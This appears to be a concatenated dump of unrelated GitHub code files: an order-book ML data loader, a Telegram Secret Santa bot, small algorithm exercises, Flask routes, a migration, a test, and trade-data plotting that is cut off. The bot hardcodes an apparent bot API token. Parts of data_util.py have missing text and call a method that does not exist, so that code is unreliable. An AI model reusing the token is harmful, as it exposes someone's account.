encoding: utf-8\n# file: data_util.py\n# author: shawn233\n\nfrom __future__ import print_function\nimport os\nimport sys\nimport time\nimport numpy as np\n\n'''\nFunctions:\n1. divide data into training set, dev set and test set (7:1:2)\n2. provide function `next_batch()`, returns the next batch in one epoch;\n provide function `reset_batch()`, to reset the batch for a new epoch.\n\nUsage tips:\n1. Assume memory is large enough to store all data, will use `readlines()` to read data;\n'''\n\n'''\nTODO:\n1. divide data based on date; (done)\n2. add time stamp to feature; (done)\n3. delete midprice for feature; (done)\n4. clean data to include only 3-sec intervals; (done)\n5. remove time stamp intervals from features; (done)\n6. attemp: remove volume from features; success? (seens not)\n7. fine processing of data_matrix to get more train data: \n eliminate intervals less than 3 secs; (done) (may need to discard)\n8. correct the mistake of crossing a day when calculating mean mid price;\n9. correct the mistake of deleting time stamps for calculating mean mid price;\n\n'''\n\nTRAIN_INPUTS_FILENAME = 'train_inputs.npy'\nTRAIN_LABELS_FILENAME = 'train_labels.npy'\nDEV_INPUTS_FILENAME = 'dev_inputs.npy'\nDEV_LABELS_FILENAME = 'dev_labels.npy'\nTEST_INPUTS_FILENAME = 'test_inputs.npy'\nTEST_LABELS_FILENAME = 'test_labels.npy'\n\nTRAIN_MEANS_FILENAME = 'train_means.npy'\nTRAIN_STDDEVS_FILENAME = 'train_stddevs.npy'\nDEV_MEANS_FILENAME = 'dev_means.npy'\nDEV_STDDEVS_FILENAME = 'dev_stddevs.npy'\nTEST_MEANS_FILENAME = 'test_means.npy'\nTEST_STDDEVS_FILENAME = 'test_stddevs.npy'\n\nTRAIN_DATA_FILENAME = 'train_data.csv'\nTEST_DATA_FILENAME = 'test_data.csv'\n\nTRAIN_DATA_PRE_PROCESSED_FILENAME = 'train_preprocessed.npy'\nTEST_DATA_PRE_PROCESSED_FILENAME = 'test_preprocessed.npy'\nPRE_PROCESS_RECORD_FILENAME = 'preprocess.txt'\n\n\ndef _save_data (inputs, labels, full_path_dir, inputs_name, label_name):\n '''\n Save data into full_path_dir\n \n used in function `divide_data()`\n '''\n\n #arr_inputs = np.array(inputs, dtype=np.float32)\n #arr_labels = np.array(labels, dtype=np.float32)\n\n np.save(os.path.join (full_path_dir, inputs_name), inputs)\n np.save(os.path.join (full_path_dir, label_name), labels)\n\n\ndef _read_data (full_path_dir, inputs_name, labels_name):\n '''\n Read data from full_path_dir\n \n Returns:\n inputs, labels\n '''\n\n return np.load (os.path.join (full_path_dir, inputs_name)),\\\n np.load (os.path.join (full_path_dir, labels_name))\n\n\nclass OrderBook:\n\n '''\n Order book class, designed mainly for data input\n '''\n\n def __init__ (self, batch_size, data_dir, \n num_inputs=10,\\\n num_labels=20,\\\n data_regenerate_flag=False):\n '''\n Initialization, open the files and set the arguments\n\n Args:\n - batch_size: int;\n - data_dir: string, directory of the data\n - data_regenerate_flag: bool, True if re-process data, False if use stored data\n '''\n\n self._batch_size = batch_size\n self.batch_ind = 0\n self._data_dir = data_dir\n self._num_inputs = num_inputs\n self._num_labels = num_labels\n self.num_features = None # will be later set after processing data\n\n # vars for training set\n self.train_inputs = None\n self.train_labels = None\n self.train_means = None\n self.train_stddevs = None\n\n # vars for dev set\n self.dev_inputs = None\n self.dev_labels = None\n self.dev_means = None\n self.dev_stddevs = None\n\n # vars for test set\n self.test_inputs = None\n self.test_labels = None\n self.test_means = None\n self.test_stddevs = None\n\n # var for recording index in data matrix\n self.index = {\n 'Date':1,\n 'Time':2,\n 'MidPrice':3,\n 'LastPrice':4,\n 'Volume':5,\n 'BidPrice1':6,\n 'BidVolume1':7,\n 'AskPrice1':8,\n 'AskVolume1':9,\n 'TimeStamp':10\n }\n \n if data_regenerate_flag or not os.path.exists (os.path.join (self._data_dir, TRAIN_INPUTS_FILENAME)):\n self.__data_process_procedure()\n\n self.train_inputs, self.train_labels, self.train_means, self.train_stddevs = \\\n self.__load_inputs_and_labels(os.path.join (self._data_dir, TRAIN_INPUTS_FILENAME),\\\n os.path.join (self._data_dir, TRAIN_LABELS_FILENAME),\\\n os.path.join (self._data_dir, TRAIN_MEANS_FILENAME),\\\n os.path.join (self._data_dir, TRAIN_STDDEVS_FILENAME))\n\n self.num_features = self.train_inputs.shape[2]\n\n\n\n\n @property\n def batch_size (self):\n return self._batch_size\n\n \n @batch_size.setter\n def batch_size (self, value):\n self._batch_size = value\n\n \n @property\n def data_dir (self):\n return self._data_dir\n\n\n @data_dir.setter\n def data_dir (self, value):\n self._data_dir = value\n\n\n @property\n def num_samples (self):\n '''\n Number of training samples\n '''\n\n return self.train_inputs.shape[0]\n\n \n @property\n def num_batches (self):\n '''\n Maximum number of batches that can be provided in one epoch\n '''\n return int (self.num_samples / self.batch_size)\n\n\n\n def __data_process_procedure (self):\n '''\n Define the procedure of data processing\n\n Args:\n None\n\n Returns:\n None\n '''\n\n # train data\n print (\"Start processing training data\")\n print (\"Reading data matrix...\")\n data_matrix = \\\n self.__read_data_matrix (os.path.join (self._data_dir, TRAIN_DATA_FILENAME))\n print (\"Done\")\n print (\"Dividing data matrix into days...\")\n day_matrix_list = \\\n self.__divide_by_day (data_matrix)\n print (\"Done\")\n print (\"Generating samples...\")\n sample_inputs_list, sample_labels_list, base_index = \\\n self.__generate_samples (day_matrix_list)\n print (\"Done\")\n print (\"Normalizing samples...\")\n sample_inputs_list, sample_labels_list, mean_list, stddev_list = \\\n self.__sample_normalization (sample_inputs_list, sample_labels_list, base_index)\n print(\"Done\")\n print(\"Remove lastPrice feature...\")\n sample_inputs_list, sample_labels_list, mean_list, stddev_list = \\\n self.__remove_lastPrice(sample_inputs_list, sample_labels_list, base_index)\n print (\"Done\")\n print (\"Saving samples...\")\n train_inputs_path, train_labels_path, train_means_path, train_stddevs_path = \\\n self.__store_inputs_and_labels (sample_inputs_list, sample_labels_list, mean_list, stddev_list)\n print (\"Done\")\n print (\"Processing training data completed\")\n\n # test data\n print (\"Start procssing test data\")\n print (\"Reading data matrix...\")\n data_matrix = \\\n self.__read_data_matrix (os.path.join (self._data_dir, TEST_DATA_FILENAME))\n print (\"Done\")\n print (\"Parsing test data...\")\n test_inputs_list, base_index = \\\n self.__parse_test_data (data_matrix)\n print (\"Done\")\n print (\"Normalizing test inputs...\")\n meaningless_test_labels_list = np.zeros (shape=[len(test_inputs_list)]) # just fit the arguments of __sample_normalization\n test_inputs_list, meaningless_test_labels_list, mean_list, stddev_list = \\\n self.__sample_normalization (test_inputs_list, meaningless_test_labels_list, base_index)\n print (\"Done\")\n print (\"Saving test inputs...\")\n self.__store_test_inputs (test_inputs_list, mean_list, stddev_list)\n print (\"Done\")\n print (\"Procssing test data completed\")\n\n\n\n def __read_data_matrix(self, in_filename):\n '''\n Read the train data matrix\n\n Args:\n - in_filename: string, input file name;\n\n Returns:\n - data_matrix: 2-d np matrix, dtype= refer4:\n continue # remove the data not in transaction time\n line.append (timeStamp)\n data_matrix.append (line)\n \n in_f.close()\n\n data_matrix = np.asarray (data_matrix)\n print ('data matrix shape:', data_matrix.shape)\n \n return data_matrix\n\n\n\n def __divide_by_day (self, input_matrix):\n '''\n Divide train data by day and morning/afternoon\n\n Args:\n - input_matrix: 2-d np matrix, dtype= 1e-4:\n if show_error:\n print ('[validate error] input matrix timestamp error:')\n print (input_matrix)\n return False\n\n for i in range (self._num_labels):\n if np.abs (midprice_matrix[i, 0]) > 3.1:\n if show_error:\n print ('[validate error] mid price matrix crosses a day')\n print (midprice_matrix)\n return False\n\n return True\n\n\n\n def __divide_data (self, in_filename):\n '''\n [Discard]\n Divide data into training set, and dev set (9:1), **after pre-processing**\n \n Args:\n - in_filename: string, full path of pre-processed data file\n \n Returns:\n - None\n\n (Implementation specified for projects, can not be reused)\n '''\n \n input_size = 10\n output_avg_len = 20\n\n data_matrix = np.load (in_filename)\n \n # 1. generate inputs and lables from data_matrix\n inputs = []\n labels = []\n\n total_cnt = 0\n accepted_cnt = 0\n\n num_inputs = data_matrix.shape[0] - (input_size + output_avg_len) + 1\n\n # mean and stddev prepared for later calculation\n pre_mean_labels = self.pre_mean[1]\n pre_stddev_labels = self.pre_stddev[1]\n \n for i in range (num_inputs):\n # delete midprice from input features \n input_matrix = np.hstack ((data_matrix[i:(i+input_size), :1], \n data_matrix[i:(i+input_size), 2:]))\n total_cnt += 1\n \n input_matrix[0, 0] = 3.0\n midprice_matrix = data_matrix[i+input_size:i+input_size+output_avg_len, 1:2]\n midprice_timestamp_matrix = data_matrix[i+input_size:i+input_size+output_avg_len, :1]\n if (self.__validate_input (input_matrix, midprice_timestamp_matrix)):\n accepted_cnt += 1\n inputs.append (input_matrix[:, 1:])\n label_val = np.mean (midprice_matrix)\n labels.append ((label_val-pre_mean_labels)/pre_stddev_labels)\n\n assert len(inputs) == len(labels)\n print ('accepted train samples:', accepted_cnt, '/', total_cnt)\n\n # 2. divide train data and dev data\n indices = np.asarray(list (range(len(inputs))))\n np.random.shuffle (indices)\n\n train_data_bound = int (np.ceil(len(inputs) * 0.9))\n dev_data_bound = len (inputs)\n\n train_inputs = []\n train_labels = []\n dev_inputs = []\n dev_labels = []\n\n for i in indices[:train_data_bound]:\n train_inputs.append (inputs[i])\n train_labels.append (labels[i])\n\n for i in indices[train_data_bound:]:\n dev_inputs.append (inputs[i])\n dev_labels.append (labels[i])\n\n train_inputs = np.asarray (train_inputs)\n train_labels = np.asarray (train_labels)\n dev_inputs = np.asarray (dev_inputs)\n dev_labels = np.asarray (dev_labels)\n\n # 3. save train and dev data\n full_path_dir = os.path.dirname (in_filename)\n _save_data (train_inputs, train_labels, full_path_dir, TRAIN_INPUTS_FILENAME, TRAIN_LABELS_FILENAME)\n _save_data (dev_inputs, dev_labels, full_path_dir, DEV_INPUTS_FILENAME, DEV_LABELS_FILENAME)\n #_save_data (test_inputs, test_labels, full_path_dir, TEST_INPUTS_FILENAME, TEST_LABELS_FILENAME)\n\n\n\n \n def __read_test_data (self, in_filename):\n '''\n [Discard]\n Read and save test data set after pre-process test data\n\n Args:\n - in_filename: string, path of pre-processed test data.\n\n Returns:\n - None\n '''\n \n input_size = 10\n data_matrix = np.load (in_filename)\n\n num_inputs = data_matrix.shape[0] // input_size\n assert num_inputs * input_size == data_matrix.shape[0]\n\n inputs = []\n for i in range (num_inputs):\n input_matrix = np.hstack ((data_matrix[i*input_size:(i+1)*input_size, :1],\n data_matrix[i*input_size:(i+1)*input_size, 2:]))\n input_matrix[0, 0] = 3.0\n #assert self.__validate_input (input_matrix, show_error=True)\n inputs.append (input_matrix[:, 1:])\n\n full_path_dir = os.path.dirname (in_filename)\n _save_data (inputs, [], full_path_dir, TEST_INPUTS_FILENAME, TEST_LABELS_FILENAME)\n\n\n\n\n def next_batch (self):\n '''\n Get the next batch of the training set\n\n Returns:\n train_inputs_batch: a padded input batch, batch_size x max_len x n_input\n train_labels_batch: a padded label batch, batch_size x 1\n '''\n\n if self.train_inputs is None:\n self.train_inputs, self.train_labels = _read_data (self.data_dir, TRAIN_INPUTS_FILENAME, TRAIN_LABELS_FILENAME)\n\n assert self.batch_ind + self.batch_size <= len (self.train_inputs)\n\n train_batch_inputs = self.train_inputs[self.batch_ind: self.batch_ind + self.batch_size]\n train_batch_labels = self.train_labels[self.batch_ind: self.batch_ind + self.batch_size]\n\n self.batch_ind += self.batch_size\n\n return train_batch_inputs, train_batch_labels\n\n\n def reset_batch (self):\n '''\n Reset self.batch_ind for a new epoch\n '''\n\n self.batch_ind = 0\n\n\n def dev_set (self): \n '''\n Get the padded dev inputs and labels\n\n Returns:\n dev_inputs: a list of inputs (lists);\n dev_lables: a list of labels\n '''\n\n if self.dev_inputs is None:\n self.dev_inputs, self.dev_labels = _read_data (self.data_dir, DEV_INPUTS_FILENAME, DEV_LABELS_FILENAME)\n\n return self.dev_inputs, self.dev_labels\n\n\n def test_set (self):\n '''\n Get the test inputs, means and stddevs\n\n Returns:\n test_inputs: 3-d np array;\n test_means: 1-d np array;\n test_stddevs: 1-d np array;\n '''\n\n if self.test_inputs is None:\n self.test_inputs, self.test_means, self.test_stddevs = \\\n self.__load_test_inputs (os.path.join (self._data_dir, TEST_INPUTS_FILENAME),\\\n os.path.join (self._data_dir, TEST_MEANS_FILENAME),\\\n os.path.join (self._data_dir, TEST_STDDEVS_FILENAME))\n\n return self.test_inputs, self.test_means, self.test_stddevs\n\n\n\n\n\nif __name__ == \"__main__\":\n BASE_DIR = os.path.dirname (os.path.abspath(sys.argv[0]))\n #INPUT_FILENAME = 'train1.csv'\n PROJECT_DIR = os.path.dirname (BASE_DIR)\n DATA_DIR = os.path.join (PROJECT_DIR, 'data')\n\n order_book = OrderBook (2, DATA_DIR, data_regenerate_flag=True)\n \n print (order_book.num_batches)\n for i in range (10):\n inputs, labels, mean, stddev = order_book.next_batch_with_mean_and_stddev ()\n print (inputs)\n print (labels)\n print (mean)\n print (stddev)\n input ()\n\n #test_inputs, _ = order_book.test_set()\n #print (test_inputs.shape)\n\n","repo_name":"lunaryan/my_AI","sub_path":"data_util.py","file_name":"data_util.py","file_ext":"py","file_size_in_byte":29585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17396274358","text":"# - *- coding: utf- 8 - *-\nimport copy\nimport logging\nimport random\nfrom functools import wraps\n\nimport telegram\nfrom telegram.ext import Updater, CommandHandler\nfrom telegram.error import (\n TelegramError,\n Unauthorized,\n BadRequest,\n TimedOut,\n ChatMigrated,\n NetworkError,\n)\n\n\nrules_text = (\n \"Правила Секретного Санты: \\n\"\n + \"1. Санта Секретный - никому не говори, кто тебе выпал!\\n\"\n + \"2. Подарок должен быть не дороже 200 грн.\\n\"\n + \"3. Спрячь свой подарок в красный мешок (найдешь его под елкой).\\n\"\n + \"4. Санта придет к тебе только после боя курантов.\\n\"\n)\n\n\ndef send_typing_action(func):\n \"\"\"Sends typing action while processing func command.\"\"\"\n\n @wraps(func)\n def command_func(*args, **kwargs):\n bot, update = args\n bot.send_chat_action(\n chat_id=update.effective_message.chat_id, action=telegram.ChatAction.TYPING\n )\n return func(bot, update, **kwargs)\n\n return command_func\n\n\n@send_typing_action\ndef start(bot, update):\n if update.message.chat.type == \"group\":\n bot.send_message(\n chat_id=update.message.chat_id,\n text=\"Я тайный помощник Санты. Для того , чтобы магия произошла, \"\n \"кликни сюда -> @\" + str(bot.get_me()[\"username\"]) + \" и нажми старт!\",\n )\n bot.send_message(\n chat_id=update.message.chat_id,\n text=rules_text,\n parse_mode=telegram.ParseMode.HTML,\n )\n\n else:\n bot.send_message(\n chat_id=update.message.chat_id,\n text=\"Круто, мы не забудем о тебе. Переходи в общий чат и регистрируйся.\",\n )\n\n\n@send_typing_action\ndef rules(bot, update):\n bot.send_message(\n chat_id=update.message.chat_id,\n text=rules_text,\n parse_mode=telegram.ParseMode.HTML,\n )\n\n\npeople = []\npairs = dict()\n\n\n@send_typing_action\ndef register(bot, update):\n u = User(\n update.effective_user.id,\n update.effective_user.username,\n update.effective_user.first_name,\n update.effective_user.last_name,\n )\n if u not in people:\n # print(update.effective_user.id)\n print(update.effective_user.username)\n # print(update.effective_user.first_name)\n # print(update.effective_user.last_name)\n people.append(u)\n bot.send_message(\n update.effective_user.id, \"Ты добавлен в список Секретного Санты!\"\n )\n else:\n bot.send_message(\n update.effective_user.id,\n \"Ты уже добавлен в мой список. Жди когда волшебство произойдет\",\n )\n\n\ndef info(bot, update):\n for p in people:\n print(p.username)\n print(p.last_name)\n\n\nclass User:\n def __init__(self, user_id, username, first_name, last_name):\n self.user_id = user_id\n self.username = username\n self.first_name = first_name\n self.last_name = last_name\n\n def __hash__(self):\n return hash(self.user_id)\n\n def __eq__(self, other):\n return self.user_id == other.user_id\n\n\ndef secret_santa(names):\n my_list = names\n choose = copy.copy(my_list)\n result = []\n for i in my_list:\n names = copy.copy(my_list)\n names.pop(names.index(i))\n chosen = random.choice(list(set(choose) & (set(names))))\n result.append((i, chosen))\n choose.pop(choose.index(chosen))\n return result\n\n\ndef magic(bot, update):\n # try:\n if update.effective_user.username == \"yarikpavlin\":\n print(\"Length \" + str(len(people)))\n if len(people) == bot.get_chat_members_count(update.message.chat.id) - 1:\n for i in secret_santa(people):\n # i - array with pari of receiver and provider\n # i[0] - user which is going to make a present\n # i[1] - user which is going to take a present\n # If receiver has username, show his username\n if i[1].username is not None:\n print(i[1])\n bot.send_message(\n i[0].user_id,\n \"Ты должен подготовить подарок для @\" + str(i[1].username),\n )\n # Else, show just first name\n else:\n bot.send_message(\n i[0].user_id,\n \"Ты должен подготовить подарок для \" + str(i[1].first_name),\n )\n\n print(\"Gifts almost here\")\n bot.send_message(\n chat_id=update.message.chat_id,\n text=\"Супер! Каждый получил своего тайного санту! Остаеться ждать Нового Года!\",\n )\n else:\n print(\"Some later, now it's \")\n bot.send_message(\n update.effective_user.id, \"Some later, now it's \" + str(len(people))\n )\n else:\n print(\"You are not Santa's helper, I'm sorry \")\n bot.send_message(\n update.effective_user.id, \"You are not Santa's helper, I'm sorry \"\n )\n\n\n# except Exception as inst:\n# print(inst)\n# print(people)\n# print(secret_santa(people))\n\n\ndef error_callback(bot, update, error):\n try:\n raise error\n except Unauthorized:\n print(error)\n # remove update.message.chat_id from conversation list\n except BadRequest:\n print(error)\n # handle malformed requests - read more below!\n except TimedOut:\n print(error)\n # handle slow connection problems\n except NetworkError:\n print(error)\n # handle other connection problems\n except ChatMigrated as e:\n print(error)\n # the chat_id of a group has changed, use e.new_chat_id instead\n except TelegramError:\n print(error)\n # handle all other telegram related errors\n\n\ndef main():\n logging.basicConfig(\n format=\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\",\n level=logging.INFO,\n )\n logger = logging.getLogger(__name__)\n # Create Updater object and attach dispatcher to it\n updater = Updater(token=\"673782777:AAEmRHnnJVe5npGALLSUquytHaRlQ-TfPh8\")\n dispatcher = updater.dispatcher\n print(\"Bot started\")\n\n # Add command handler to dispatcher\n start_handler = CommandHandler(\"start\", start)\n register_handler = CommandHandler(\"register\", register)\n info_handler = CommandHandler(\"info\", info)\n rules_handler = CommandHandler(\"rules\", rules)\n magic_handler = CommandHandler(\"magic\", magic)\n\n dispatcher.add_handler(start_handler)\n dispatcher.add_handler(register_handler)\n dispatcher.add_handler(info_handler)\n dispatcher.add_handler(rules_handler)\n dispatcher.add_handler(magic_handler)\n dispatcher.add_error_handler(error_callback)\n\n # Start the bot\n updater.start_polling()\n\n # Run the bot until you press Ctrl-C\n updater.idle()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"yarikpavlin/secret-santa-prototype","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":7393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31179775138","text":"n = int(input())\r\n\r\narr = list(map(int, input().split()))\r\n\r\narr = [-1] + arr\r\n\r\nm = int(input())\r\n\r\nstu = []\r\n\r\n\r\ndef male(num):\r\n for i in range(1, n+1):\r\n if i % num == 0:\r\n if arr[i] == 1:\r\n arr[i] = 0\r\n else:\r\n arr[i] = 1\r\n\r\n\r\ndef female(num):\r\n if arr[num] == 1:\r\n arr[num] = 0\r\n else:\r\n arr[num] = 1\r\n\r\n left = num - 1\r\n right = num + 1\r\n\r\n while left > 0 and right <= n:\r\n if arr[left] == arr[right]:\r\n if arr[left] == 1:\r\n arr[left] = 0\r\n arr[right] = 0\r\n else:\r\n arr[left] = 1\r\n arr[right] = 1\r\n\r\n left -= 1\r\n right += 1\r\n else:\r\n break\r\n\r\n\r\nfor i in range(m):\r\n sex, num = map(int, input().split())\r\n\r\n if sex == 1:\r\n male(num)\r\n else:\r\n female(num)\r\n\r\n\r\nfor i in range(1, len(arr)):\r\n if i > 0 and i % 20 == 0:\r\n print(arr[i])\r\n else:\r\n print(arr[i], end=' ')\r\n","repo_name":"junheeLee96/algorithm","sub_path":"백준/Silver/1244. 스위치 켜고 끄기/스위치 켜고 끄기.py","file_name":"스위치 켜고 끄기.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"38584344458","text":"#Format input names, given as strings, as follows\r\n#Sample\r\n#Input Output\r\n#Aryadev Aryadev\r\n#Rajsekhar Basu R. Basu\r\n#Nabaneeta Dev Sen N. D. Sen\r\n#Dawlat Wazir Bahram Khan D. W. B. Khan\r\n\r\n\r\n\r\nstr=input(\"Enter your full name:\")\r\nli=str.split() #split function is use to convert a string into a list\r\nn=len(li)-1 #len function is use to find thelength of the list\r\nfor i in range(0,n):\r\n word=li[i] #in the word variable we store the element of the list\r\n print(word[0:1],end=\"\") #using string slicing we print the first letter of the each element of the list without the last element\r\n print(\". \",end=\"\")\r\nprint(li[n]) #print the last element of the list\r\n\r\n#set1\r\n#Enter your full name:Rajsekhar Basu\r\n#R. Basu\r\n\r\n#set2\r\n#Enter your full name:Dawlat Wazir Bahram Khan\r\n#D. W. B. Khan\r\n\r\n","repo_name":"Avishikta2312/Python-Assignment","sub_path":"4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74843295209","text":"import json\n\nfrom flask import Blueprint, request\nfrom controllers import main_controller\n\npage = Blueprint('main', __name__)\n\n\n@page.route('/', methods=['GET'])\ndef index():\n return main_controller.main_get()\n\n\n@page.route('/get_data/', methods=['GET'], defaults={'uid': None})\n@page.route('/get_data/', methods=['GET'])\ndef get_data(uid):\n\n if uid is not None:\n with open(f'static/output/audio_{uid}.json', 'r') as f:\n data = json.load(f)\n main_controller.remove_files(uid, is_output=True)\n return data\n\n main_controller.remove_files(uid, is_output=True)\n\n return []\n\n\n@page.route('/example/', methods=['GET'])\ndef example_get():\n return main_controller.example_get()\n\n\n@page.route('/model', methods=['POST'])\ndef model_post():\n data = request.get_json()\n\n keys = ['audio', 'sample_rate']\n\n for key in keys:\n if key not in data:\n return {'status': 'error', 'message': f'{key} not in request'}\n\n return main_controller.model_post(data['audio'], data['sample_rate'])\n","repo_name":"Berkay-23/diarizationAPI","sub_path":"routers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19923483584","text":"#Calculando o preço da viagem para 0.50 até 200km se passar disso 0.45\n\nnum = int(input('Digite a distância: '))\nif num <= 200:\n distancia = num * 0.50\n print('Nessa distância, ficará por: R$ {:.2f}'.format(distancia))\nelse:\n distancia2 = num * 0.45\n print('Nessa distância, ficará por: R$ {:.2f}'.format(distancia2))\n\n\n\n#Da pra fazer o IF/ELSE assim também: \n# num=distancia*0.50 if distancia <= 200 else distancia * 0.45 \n#gostei nao mas é isso ai gabriel do futuro, ta anotado.\n","repo_name":"gaxque/Codando-JR","sub_path":"Calcular-KM.py","file_name":"Calcular-KM.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35995819329","text":"\"\"\"empty message\n\nRevision ID: bcf853c67790\nRevises: f30cc5d13b95\nCreate Date: 2021-08-03 19:26:35.440576\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'bcf853c67790'\ndown_revision = 'f30cc5d13b95'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint('districts_name_key', 'districts', type_='unique')\n op.add_column('judgments', sa.Column(\n 'court_order_number', sa.Integer(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('judgments', 'court_order_number')\n op.create_unique_constraint('districts_name_key', 'districts', ['name'])\n # ### end Alembic commands ###\n","repo_name":"red-door-collective/eviction-tracker","sub_path":"migrations/versions/bcf853c67790_.py","file_name":"bcf853c67790_.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"27201657882","text":"import pytest\nfrom src.createcompendia.geneprotein import build_compendium\nimport os\n\ndef test_gp():\n here=os.path.abspath(os.path.dirname(__file__))\n gene_compendium = os.path.join(here,'testdata','gptest_Gene.txt')\n protein_compendium = os.path.join(here,'testdata','gptest_Protein.txt')\n geneprotein_concord = os.path.join(here,'testdata','gp_UniProtNCBI.txt')\n outfile = os.path.join(here,'testdata','gp_output.txt')\n build_compendium(gene_compendium, protein_compendium, geneprotein_concord, outfile)\n with open(outfile,'r') as inf:\n x = inf.read()\n assert len(x) > 0\n print(x)\n","repo_name":"TranslatorSRI/Babel","sub_path":"tests/test_geneproteiny.py","file_name":"test_geneproteiny.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"10060240818","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\n\n#opening the file\n\ndf1 = pd.read_excel('India_Imports_2011-12_And_2012-13.xls')\t#reading import file\n\ndf2 = pd.read_excel('India_Exports_2011-12_And_2012-13.xls')\t#reading export file\n\nwriter=open('table.tex','w')\n\n#top five import and export destination by total import and export (based on value)\n\n\nop1=df1.groupby('Country').agg({'Value-INR-2011-12':'sum'})\t\t#grouping sum of values of ech country\n\nop2=df2.groupby('Country').agg({'Value-INR-2011-12':'sum'})\n\n\nop1=op1.reset_index()\nop2=op2.reset_index()\n\nop1=op1.nlargest(5, 'Value-INR-2011-12' )\t\t#extraction top 5 values from the results\nop2=op2.nlargest(5, 'Value-INR-2011-12' )\n\n\n\n#for import\ntotal=df1['Value-INR-2011-12'].sum()\nsum1=op1['Value-INR-2011-12'].sum()\n\nother=total-sum1\t\t\t\t#calculating sum of other countries\nop1.loc[5]=['Others',other]\n\nslices=op1['Value-INR-2011-12']\n\ncountry=op1['Country']\n\nplt.pie(slices, labels=country)\n\n\nplt.title('Top 5 Country pie chart for import of year 2011-12')\n\n\nplt.savefig('image1.jpg', bbox_inches='tight')\nplt.clf()\n\n#for export\n\ntotal=df2['Value-INR-2011-12'].sum()\nsum2=op2['Value-INR-2011-12'].sum()\n\nother=total-sum2\t\t\t\t#calculating sum of other countries\nop2.loc[5]=['Others',other]\n\nslices=op2['Value-INR-2011-12']\n\ncountry=op2['Country']\n\nplt.pie(slices, labels=country)\n\n\nplt.title('Top 5 Country pie chart for export of year 2011-12')\n\n\nplt.savefig('image2.jpg', bbox_inches='tight')\nplt.clf()\n\n\n#bar chart for top 5 commodity\ncom1=df1.groupby('Commodity').agg({'Value-INR-2011-12':'sum'})\t\t\t\t#grouping sum of values of ech country\n\ncom2=df2.groupby('Commodity').agg({'Value-INR-2011-12':'sum'})\n\ncom1=com1.reset_index()\t\t\t\t\t\t#resettin index of both\ncom2=com2.reset_index()\n\ncom1=com1.nlargest(5, 'Value-INR-2011-12' )\t\t\t#returning commodities with top 5 values\ncom2=com2.nlargest(5, 'Value-INR-2011-12' )\n\ncom1=com1.reset_index()\t\t\t\t\t\t#resettin index of both\ncom2=com2.reset_index()\n\n#for import\n\nx=com1.index\ny=com1['Value-INR-2011-12']\n\n\n\nplt.bar(x,y, label='bar1', color='r')\nplt.xticks(x, com1['Commodity'],rotation='vertical')\nplt.title('Import bar chart of commodity of year 2011-12')\n\nplt.xlabel('Commodity')\nplt.ylabel('Value-INR-2011-12')\nplt.savefig('image3.jpg', bbox_inches='tight')\nplt.clf()\n\n#for export\nx=com2.index\ny=com2['Value-INR-2011-12']\n\n\n\nplt.bar(x,y, label='bar1', color='c')\nplt.xticks(x, com2['Commodity'],rotation='vertical')\nplt.title('Export bar chart of commodity of year 2011-12')\n\nplt.xlabel('Commodity')\nplt.ylabel('Value-INR-2011-12')\nplt.savefig('image4.jpg', bbox_inches='tight')\nplt.clf()\n\n\n#linegraph of 'TEA' between quantity and value , plotted for stat of each coountry\n\ntea1=df1[df1['Commodity']=='TEA']\ntea2=df2[df2['Commodity']=='TEA']\n\n#import\n\ntea1=tea1.sort_values(['Quantity-2011-12'])\n\nplt.plot(tea1['Quantity-2011-12'],tea1['Value-INR-2011-12'],label='Year 2011-12')\n\ntea1=tea1.sort_values(['Quantity-2012-13'])\n\nplt.plot(tea1['Quantity-2012-13'],tea1['Value-INR-2012-13'], label='Year 2012-13')\n\nplt.title('Import plot for TEA')\n\nplt.xlabel('quantity')\nplt.ylabel('value')\nplt.legend()\nplt.savefig('image5.jpg', bbox_inches='tight')\nplt.clf()\n\n#export\n\ntea2=tea2.sort_values(['Quantity-2011-12'])\n\nplt.plot(tea2['Quantity-2011-12'],tea2['Value-INR-2011-12'],label='Year 2011-12')\n\ntea2=tea2.sort_values(['Quantity-2012-13'])\n\nplt.plot(tea2['Quantity-2012-13'],tea2['Value-INR-2012-13'], label='Year 2012-13')\n\nplt.title('Export plot for TEA')\n\nplt.xlabel('quantity')\nplt.ylabel('value')\nplt.legend()\nplt.savefig('image6.jpg', bbox_inches='tight')\nplt.clf()\n\n\n#Scatterplot of 'RICE' between quantity and value , plotted for stat of each coountry\n\nrice1=df1[df1['Commodity']=='TEA']\nrice2=df2[df2['Commodity']=='TEA']\n\n#import\n\nrice1=rice1.sort_values(['Quantity-2011-12'])\n\nplt.scatter(rice1['Quantity-2011-12'],rice1['Value-INR-2011-12'],label='Year 2011-12' , marker='x',s=10)\n\nrice1=rice1.sort_values(['Quantity-2012-13'])\n\nplt.scatter(rice1['Quantity-2012-13'],rice1['Value-INR-2012-13'], label='Year 2012-13',marker='o',s=10)\n\nplt.title('Import scatter plot for 